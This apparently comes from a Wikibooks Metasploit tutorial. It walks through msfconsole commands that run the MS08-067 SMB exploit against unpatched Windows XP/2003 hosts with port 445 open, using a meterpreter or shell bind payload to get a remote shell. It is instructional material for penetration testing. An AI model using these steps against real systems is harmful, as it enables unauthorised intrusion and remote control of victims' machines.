Metasploit/Caseofstudy

A simple manual exploitation using metasploit
Assumptions:


 * you are using metasploit's latest version and exploits (svn / subversion)
 * The target machine is a windows box with windows XP (SP1,SP2,SP3) or Windows 2003 (SP0)
 * The target machine has port 445 open (check it via nmap -p 445 

Steps:


 * 1. load msfconsole of metasploit
 * 2. msf > info exploit/windows/smb/ms08_067_netapi
 * 3. msf> use exploit/windows/smb/ms08_067_netapi
 * 4. msf exploit(ms08_067_netapi) > show options
 * 5. msf exploit(ms08_067_netapi) > set RHOST
 * 6. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
 * !. You can also use generic/shell_bind_tcp as payload to get a command prompt.
 * 7. msf exploit(ms08_067_netapi) > set TARGET .
 * 8. msf exploit(ms08_067_netapi) > exploit

If everything goes like this, you will get a meterpreter shell. From there onwards you can do post exploitation stuff ( explained in Post exploitation activities|http://en.wikibooks.org/wiki/Metasploit/post_exploitation)

Video Guide on using MS08_067_Netapi:

http://guides.intern0t.net/msf1.php